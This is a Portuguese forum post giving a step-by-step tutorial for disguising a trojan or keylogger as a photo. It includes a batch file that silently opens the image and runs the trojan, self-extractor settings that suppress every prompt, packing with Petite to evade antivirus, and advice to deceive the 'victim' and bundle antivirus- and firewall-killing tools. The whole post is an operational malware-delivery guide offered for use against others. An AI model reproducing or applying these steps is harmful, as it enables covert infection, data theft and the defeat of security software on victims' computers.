Registar  |  FAQ  |  Pesquisar  |  Membros  |  Grupos  |  Entrar 
Responder a Mensagem
 Camuflando um vírus 
Ricardo_157


Registrado em: 03 Jun 2007
Mensagens: 4
Responder com Citação
Joiner "natural" e indetectável
Olá pessoal!

Creio que gostem deste tutorial pois vou abordar um assunto que se torna cada dia mais
difícil para nós fussadores: Joiners.

Pessoal como todos sabemos, não existem muitos joiners de licença pública nos quais podemos
nos esbaldar sem a interferência de anti-vírus. Acompanhem meu ponto de vista:
Não podemos usar programas hackers por causa dos anti-vírus serto? Então não usaremos!
Minha proposta é usarmos meios alternativos para os nossos fins, como esse tutorial que
irei apresentar.. Não usaremos nenhuma ferramenta hacker, apenas o vírus ou o que se deseja
juntar, mas somente o propriamente dito. Chega de enrolar e vamos ao tutorial:

==============
Ingredientes =D
==============
-Filzip (www.filzip.com)
-Petite (www.un4seen.com/petite/)
-Arquivo Batch (criaremos depois)
-Foto de preferêcia (chamaremos de FOTO.JPG)
-Trojan/Keylloger de preferrência (chamarei de server.exe)

=============
Filzip?? Hmm??
=============
Pessoal como eu avia dito anteriormente, não usaremos ferramentas hackers, o Filzip server
para compactarmos e descompactarmos arquivos em vários formatos, entre eles .CAB, .TAR,
.tar.gz entre muitos outros. Mas não será esse o princípio de utilização. Usaremos a opção
de gerar arquivos auto-extraíveis no formato .EXE. Entendamos como um joiner funciona:
-O joiner pega o código dos arquivos a serem juntados
-Após isso ele os envolve em seu código fonte (como uma sacola, lá dentro eles estão
separados)
-Quando executado, o joiner manda os arquivos que estão lá dentro para a pasta temporária
de seu computador (C:/Windows/TEMP) e manda um comando para executálos.
-Em seguida os arquivos que foram copiados para a pasta TEMP são apagados.

Adivinha o que a função de gerar arquivos auto-extraíveis do Filzip faz? Isso mesmo!
Podemos conciderar o filzip como um joiner faltando opções.
==========
Petite
==========
O nosso velho amigo petite. Ele serve para compactar arquivos .EXE mudando seu código.
Se ele muda o código verdadeiro, o anti-vírus não achará nada.

===============
Hey Ho! Let's Go!
===============

Pessoal antes de tudo lembrem-se de desativar seus anti-vírus (se forem mecher com algo
que eles peguem, é claro). Instale o Filzip e descompacte o Petite na sua pasta do windows
(normalmente C:\WINDOWS).
Após feito isso iremos fazer um arquivo BATCH, irei explicar o por que depois.
Abra o bloco de notas e digite:

@ECHO OFF
START /max C:\WINDOWS\FOTO.JPG
START /m C:\WINDOWS\SERVER.EXE
EXIT

Salve esse arquivo com o nome INSERT.BAT.
Após todo essse processo, crie um arquivo zipado com o Filzip e adicione lá dentro:

-FOTO.JPG
-SERVER.EXE
-INSERT.BAT

Feito isso, note o botão AÇÕES lá em sima da janela do Filzip, Clieque-o, e dessa até
GERAR ARQUIVO .EXE, clique.
Em seguida irá abrir uma janela com as opções para gerar o arquivo auto-extraível, irei
mostrar o que marcar e desmacar dando uma explicação do por que logo abaixo.

Mude DESTINO para C:\WINDOWS
=> Isso fará com que os arquívos sejam extraídos nesta pasta, para os comandos do arquivo
Batch que criamos acharem os arquivos também.
Mude o TÍTULO DA APLICAÇÃO para picture0001
=> Apenas uma engenharia social básica =D
Acrecente em LINHA DE COMANDO o seguinte: C:\WINDOWS\INSERT.BAT
=> Com isso, logo após os arquivos serem extraídos esse comando irá rodar, fazendo com que
o aqruivo que criamos abra, concequentemente rodando os comandos que estão apontados dentro
do aqruivo BAT, abrindo a FOTO.JPG e o arquivo SERVER.EXE
Mude ARQUIVOS EXITENTES para SEMPRE SOBRESCREVER.
=> Assim o usuário não receberá a mensagem chata dizendo "Você deseja substituir os
arquivos existentes?". Provavelmente alertando a vítima.
Em CONFIGURAÇÕES DO AUTO EXTRATOR desmarque as opções MOSTRAR OPÇÕES DE SOBRESCREVER e
MOSTRAR LISTA DE ARQUIVOS. Após marque a opção NÃO PERGUNTAR ANTES DE EXTRAÍR.

=> Assim eliminamos a possibilidade da vítima ter que clicar em alguma pergunta do tipo
SIM ou NÃO, botando em risco a funcionabilidade do plano.
Clique em OK.

Pronto, agora ele está totalmente em "estado automático", basta clicar para que ele estráia
os arquivos, rode o batch e rode a foto e o server... Há um porém, o anti-vírus pode "ver"
o que tem dentro deste pacote. Ai entra o petite =D
Vou aceitar a ipótese de que o arquivo que você acabou de criar se chame Picture.exe e está
localizado na área de trabalho.
Abra seu prompt (tela principal do MS-DOS) e digite:
PETITE C:\WINDOWS\DESKTOP\PICTURE.EXE

Pronto pessoal, o anti-vírus não pode mais "ver" o conteúdo..
Espero que aproveitem esse tutorial feito com muita dedicação e imaginação. E lembrem-se:
Procure SOFTWARES para o que você quer e não HACKER TOOLS...

===============
PONTOS A DECLARAR
===============
-Alguns ati-vírus podem identificar o petite como um hacker tool, mais são raros.
-Ah sim! O ícone chato que ficou? http:www.shelllabs.com/icon_changer.htm ele muda qualquer
ícone =D
-Após os arquivos serem extraídos o anti-vírus pode pegar... Aconcelho camuflar ele usando
um packing ou um crypting...
-Por que não usar o Winrar? Sem sucesso na hora de comprimir com o petite.
-Aconcelho não deletar mais o Filzip pois, na minha opinião, ele é o melhor do compressor
que existe (freeware), até mesmo melhor que o popular WinRar... Utilizo ele com frequência.
-Para a vítima não estranhar o MS-DOS abrindo e fechando, ponha um jogo pequeno no lugar
da foto, diga que foi de sua autoria e gostaria que testasse (imaginação).
-Você pode anexar mais arquivos como um AV-Killer, ou um Firewall-Killer.. Só não esqueça
de acrescentá-los no arquivo Bath!

CREDITOS:http://www.orkut.com/Community.aspx?cmm=28123693
Ver o perfil de utilizadores Enviar Mensagem Privada
Neste fórum, você Não pode colocar mensagens novas
Não pode responder a mensagens
Não pode editar as suas mensagens
Não pode remover as suas mensagens
Você Não pode votar neste fórum
Todos os tempos são GMT  
Página 1 de 1  

  
  
 Responder a Mensagem